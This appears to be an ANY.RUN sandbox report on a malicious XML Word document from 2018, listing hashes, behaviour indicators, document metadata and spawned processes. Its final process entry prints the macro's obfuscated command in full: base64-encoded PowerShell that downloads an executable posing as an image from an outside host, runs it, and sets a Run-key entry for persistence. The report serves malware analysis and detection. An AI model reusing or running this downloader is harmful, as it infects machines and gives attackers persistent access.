Malware analysis 23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c Malicious activity

Add for printing

File name:	23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c
Full analysis:	https://app.any.run/tasks/d47ed706-3122-40d3-917d-78c117afd068
Verdict:	Malicious activity
Analysis date:	November 08, 2018, 06:34:32
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:	D6A5B472987763190497C24D0DFD74E8
SHA1:	A2228CEA5A43695656F6B5D531D56CB4C963030E
SHA256:	23FA88BBAB4EC6EC9125733D367295ACE6E828CA670A88E979FCDDFF1D63A77C
SSDEEP:	6144:N/lA5ANOZbg144HsiI1wFwo2ywm7THlYx15Gw4rqYetVp:N/lA5ANORKHsiI1w5dnFcgbrqYetVp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: off
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 2504)
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 2504)
- Changes the autorun value in the registry
  - powershell.exe (PID: 3780)
- Known privilege escalation attack
  - OTCkeomF.exe (PID: 584)
- Executes PowerShell scripts
  - cmD.exe (PID: 2748)
- Application was dropped or rewritten from another process
  - OTCkeomF.exe (PID: 584)
  - OTCkeomF.exe (PID: 944)
SUSPICIOUS
- Starts Microsoft Office Application
  - MSOXMLED.EXE (PID: 3204)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3780)
- Creates files in the user directory
  - powershell.exe (PID: 3780)
- Modifies the open verb of a shell class
  - OTCkeomF.exe (PID: 584)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2504)
- Creates files in the user directory
  - WINWORD.EXE (PID: 2504)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (42.2)
.rels	\|	Open Office XML Relationships (27.2)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (20.1)
.svg	\|	Scalable Vector Graphics (var.3) (4.3)
.opml/xml	\|	Outline Processor Markup Language (3.4)

EXIF

XMP

PackagePartXmlDataWebSettingsAllowPNG:	-
PackagePartXmlDataWebSettingsOptimizeForBrowser:	-
PackagePartXmlDataWebSettingsIgnorable:	w14 w15 w16se w16cid
PackagePartXmlDataFontsFontSigCsb1:	00000000
PackagePartXmlDataFontsFontSigCsb0:	000001FF
PackagePartXmlDataFontsFontSigUsb3:	00000000
PackagePartXmlDataFontsFontSigUsb2:	00000009
PackagePartXmlDataFontsFontSigUsb1:	C000247B
PackagePartXmlDataFontsFontSigUsb0:	E0002AFF
PackagePartXmlDataFontsFontPitchVal:	variable
PackagePartXmlDataFontsFontFamilyVal:	swiss
PackagePartXmlDataFontsFontCharsetVal:	00
PackagePartXmlDataFontsFontPanose1Val:	020F0502020204030204
PackagePartXmlDataFontsFontName:	Calibri
PackagePartXmlDataFontsIgnorable:	w14 w15 w16se w16cid
PackagePartXmlDataCorePropertiesModified:	2018:11:07 12:17:00Z
PackagePartXmlDataCorePropertiesModifiedType:	dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated:	2018:11:07 12:17:00Z
PackagePartXmlDataCorePropertiesCreatedType:	dcterms:W3CDTF
PackagePartXmlDataCorePropertiesRevision:	1
PackagePartXmlDataCorePropertiesLastModifiedBy:	Dimitri czar
PackagePartXmlDataCorePropertiesDescription:	-
PackagePartXmlDataCorePropertiesKeywords:	-
PackagePartXmlDataCorePropertiesCreator:	Dimitri czar
PackagePartXmlDataCorePropertiesSubject:	-
PackagePartXmlDataCorePropertiesTitle:	-
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW:	108
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW:	-
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW:	108
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW:	-
PackagePartXmlDataStylesStyleTblPrTblIndType:	dxa
PackagePartXmlDataStylesStyleTblPrTblIndW:	-
PackagePartXmlDataStylesStyleUnhideWhenUsed:	-
PackagePartXmlDataStylesStyleSemiHidden:	-
PackagePartXmlDataStylesStyleUiPriorityVal:	1
PackagePartXmlDataStylesStyleQFormat:	-
PackagePartXmlDataStylesStyleNameVal:	Normal
PackagePartXmlDataStylesStyleStyleId:	Normal
PackagePartXmlDataStylesStyleDefault:	1
PackagePartXmlDataStylesStyleType:	paragraph
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed:	1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden:	1
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat:	1
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority:	-
PackagePartXmlDataStylesLatentStylesLsdExceptionName:	Normal
PackagePartXmlDataStylesLatentStylesCount:	375
PackagePartXmlDataStylesLatentStylesDefQFormat:	-
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed:	-
PackagePartXmlDataStylesLatentStylesDefSemiHidden:	-
PackagePartXmlDataStylesLatentStylesDefUIPriority:	99
PackagePartXmlDataStylesLatentStylesDefLockedState:	-
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule:	auto
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine:	259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter:	160
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi:	ar-SA
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia:	en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal:	en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal:	22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal:	22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme:	minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme:	minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme:	minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme:	minorHAnsi
PackagePartXmlDataStylesIgnorable:	w14 w15 w16se w16cid
PackagePartXmlDataPropertiesAppVersion:	16
PackagePartXmlDataPropertiesHyperlinksChanged:	-
PackagePartXmlDataPropertiesSharedDoc:	-
PackagePartXmlDataPropertiesCharactersWithSpaces:	1
PackagePartXmlDataPropertiesLinksUpToDate:	-
PackagePartXmlDataPropertiesCompany:	-
PackagePartXmlDataPropertiesScaleCrop:	-
PackagePartXmlDataPropertiesParagraphs:	1
PackagePartXmlDataPropertiesLines:	1
PackagePartXmlDataPropertiesDocSecurity:	-
PackagePartXmlDataPropertiesApplication:	Microsoft Office Word
PackagePartXmlDataPropertiesCharacters:	1
PackagePartXmlDataPropertiesWords:	-
PackagePartXmlDataPropertiesPages:	1
PackagePartXmlDataPropertiesTotalTime:	-
PackagePartXmlDataPropertiesTemplate:	Normal.dotm
PackagePartXmlDataPropertiesXmlns:	http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataSettingsDocIdVal:	{D3F60254-1C5C-4604-83DB-73C38CBCD213}
PackagePartXmlDataSettingsChartTrackingRefBased:	-
PackagePartXmlDataSettingsListSeparatorVal:	,
PackagePartXmlDataSettingsDecimalSymbolVal:	.
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData:	1
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt:	edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt:	edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax:	1026
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt:	edit
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink:	followedHyperlink
PackagePartXmlDataSettingsClrSchemeMappingHyperlink:	hyperlink
PackagePartXmlDataSettingsClrSchemeMappingAccent6:	accent6
PackagePartXmlDataSettingsClrSchemeMappingAccent5:	accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent4:	accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent3:	accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent2:	accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent1:	accent1
PackagePartXmlDataSettingsClrSchemeMappingT2:	dark2
PackagePartXmlDataSettingsClrSchemeMappingBg2:	light2
PackagePartXmlDataSettingsClrSchemeMappingT1:	dark1
PackagePartXmlDataSettingsClrSchemeMappingBg1:	light1
PackagePartXmlDataSettingsThemeFontLangVal:	en-US
PackagePartXmlDataSettingsMathPrNaryLimVal:	undOvr
PackagePartXmlDataSettingsMathPrIntLimVal:	subSup
PackagePartXmlDataSettingsMathPrWrapIndentVal:	1440
PackagePartXmlDataSettingsMathPrDefJcVal:	centerGroup
PackagePartXmlDataSettingsMathPrRMarginVal:	-
PackagePartXmlDataSettingsMathPrLMarginVal:	-
PackagePartXmlDataSettingsMathPrDispDef:	-
PackagePartXmlDataSettingsMathPrSmallFracVal:	-
PackagePartXmlDataSettingsMathPrBrkBinSubVal:	--
PackagePartXmlDataSettingsMathPrBrkBinVal:	before
PackagePartXmlDataSettingsMathPrMathFontVal:	Cambria Math
PackagePartXmlDataSettingsRsidsRsidVal:	00184900
PackagePartXmlDataSettingsRsidsRsidRootVal:	00184900
PackagePartXmlDataSettingsCompatCompatSettingVal:	15
PackagePartXmlDataSettingsCompatCompatSettingUri:	http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingName:	compatibilityMode
PackagePartXmlDataSettingsCharacterSpacingControlVal:	doNotCompress
PackagePartXmlDataSettingsDefaultTabStopVal:	720
PackagePartXmlDataSettingsZoomPercent:	100
PackagePartXmlDataSettingsIgnorable:	w14 w15 w16se w16cid
PackagePartXmlDataVbaSuppDataMcdsMcdCmg:	56
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt:	00
PackagePartXmlDataVbaSuppDataMcdsMcdName:	Project.c_n1xntEhWrd.G_znFYBNiXnZwXMek8kG
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName:	PROJECT.C_N1XNTEHWRD.G_ZNFYBNIXNZWXMEK8KG
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen:	-
PackagePartXmlDataVbaSuppDataIgnorable:	w14 w15 w16se w16cid wp14
PackagePartXmlDataThemeExtLstExtThemeFamilyVid:	{4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataThemeExtLstExtThemeFamilyId:	{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyName:	Office Theme
PackagePartXmlDataThemeExtLstExtUri:	{05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtraClrSchemeLst:	-
PackagePartXmlDataThemeObjectDefaults:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal:	102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal:	98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal:	150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal:	93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape:	1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal:	170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal:	95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal:	63000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal:	000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn:	ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist:	19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad:	57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim:	800000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal:	solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn:	ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd:	sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap:	flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW:	6350
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal:	100000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal:	67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal:	105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal:	110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape:	1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeName:	Office
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface:	游明朝
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript:	Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose:	020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface:	Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface:	游ゴシック Light
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript:	Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose:	020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface:	Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeName:	Office
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal:	954F72
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal:	0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal:	70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal:	5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal:	FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal:	A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal:	ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal:	4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal:	E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal:	44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr:	FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal:	window
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr:	000000
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal:	windowText
PackagePartXmlDataThemeThemeElementsClrSchemeName:	Office
PackagePartXmlDataThemeName:	Office Theme
PackagePartCompression:	store
PackagePartBinaryData:	(Binary data 75668 bytes, use -b option to extract)
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch:	360
PackagePartXmlDataDocumentBodySectPrColsSpace:	720
PackagePartXmlDataDocumentBodySectPrPgMarGutter:	-
PackagePartXmlDataDocumentBodySectPrPgMarFooter:	720
PackagePartXmlDataDocumentBodySectPrPgMarHeader:	720
PackagePartXmlDataDocumentBodySectPrPgMarLeft:	1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom:	1440
PackagePartXmlDataDocumentBodySectPrPgMarRight:	1440
PackagePartXmlDataDocumentBodySectPrPgMarTop:	1440
PackagePartXmlDataDocumentBodySectPrPgSzH:	15840
PackagePartXmlDataDocumentBodySectPrPgSzW:	12240
PackagePartXmlDataDocumentBodySectPrRsidR:	00184900
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst:	rect
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy:	4093845
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx:	5943600
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri:	{28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed:	rId5
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId:	1
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri:	http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName:	Picture 1
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId:	1
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB:	1905
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy:	4093845
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx:	5943600
PackagePartXmlDataDocumentBodyPRDrawingInlineDistR:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistL:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistB:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistT:	-
PackagePartXmlDataDocumentBodyPRRPrNoProof:	-
PackagePartXmlDataDocumentBodyPBookmarkEndId:	-
PackagePartXmlDataDocumentBodyPBookmarkStartName:	_GoBack
PackagePartXmlDataDocumentBodyPBookmarkStartId:	-
PackagePartXmlDataDocumentBodyPRsidRDefault:	00184900
PackagePartXmlDataDocumentBodyPRsidR:	00184900
PackagePartXmlDataDocumentIgnorable:	w14 w15 w16se w16cid wp14
PackagePartXmlDataRelationshipsRelationshipTarget:	docProps/app.xml
PackagePartXmlDataRelationshipsRelationshipType:	http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipId:	rId3
PackagePartXmlDataRelationshipsXmlns:	http://schemas.openxmlformats.org/package/2006/relationships
PackagePartPadding:	512
PackagePartContentType:	application/vnd.openxmlformats-package.relationships+xml
PackagePartName:	/_rels/.rels

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3204	"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml"	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000
2504	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	MSOXMLED.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000
2748	cmD /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARQBxADUAQwB1AFMAdgBmAHYAegB4AF8AawBLAE0ASAA4AEwAQQA1AGcAYgBOAHYAIAAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQANAAoAewANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQA7AHMAdABhAHIAdAAgACQAdwBVAG8AVwBpAG4ARwB4AGIAZwBhAGsASwBnAG0AYQBIAHQAbAAgADsAIAANAAoAfQANAAoAdAByAHkAewANAAoADQAKACQAUwBVAGIARwBrAF8ANAAyAEMAOQA4AE0AQQBlAGsAVwBHAHoAbQBIADkAagA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwATwBUAEMAawBlAG8AbQBGAC4AZQB4AGUAJwA7AA0ACgBFAHEANQBDAHUAUwB2AGYAdgB6AHgAXwBrAEsATQBIADgATABBADUAZwBiAE4AdgAgACcAaAB0AHQAcABzADoALwAvAGUALgBjAG8AawBhAC4AbABhAC8AVQBJAEkAQwBiADYALgBqAHAAZwAnACAAJABTAFUAYgBHAGsAXwA0ADIAQwA5ADgATQBBAGUAawBXAEcAegBtAEgAOQBqADsADQAKACQARABWAFgAZQBlAEUANwBqAG0AaQBwAFQANwBYAFAAVQBPAHAAUAB1AEIANQBDAG4AdwBDAFEAVAAgAD0AJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQArACcAXABPAFQAQwBrAGUAbwBtAEYALgBlAHgAZQAnADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAG0AZQAgACcAMQAwADEAMAAxADAAMQAnACAALQBWAGEAbAB1AGUAIAAkAEQAVgBYAGUAZQBFADcAagBtAGkAcABUADcAWABQAFUATwBwAFAAdQBCADUAQwBuAHcAQwBRAFQAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAJwBTAHQAcgBpAG4AZwAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A	C:\Windows\system32\cmD.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
